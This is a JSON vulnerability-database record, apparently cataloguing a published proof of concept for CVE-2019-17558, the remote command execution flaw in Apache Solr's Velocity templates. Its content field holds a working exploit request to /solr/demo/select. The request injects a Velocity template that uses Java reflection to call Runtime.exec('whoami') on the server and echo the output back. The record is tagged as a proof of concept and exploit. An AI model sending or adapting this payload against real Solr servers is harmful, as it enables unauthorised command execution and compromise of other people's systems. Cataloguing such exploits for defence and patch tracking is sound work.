{"uuid": "edd01b61-9ea0-499d-b4be-2d3237c5a81c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-17558", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1297", "content": "CVE-2019-17558 \u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\n\nget /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end\n\n%27whoami%27\n\n#poc #exploit", "creation_timestamp": "2023-10-16T05:49:24.000000Z"}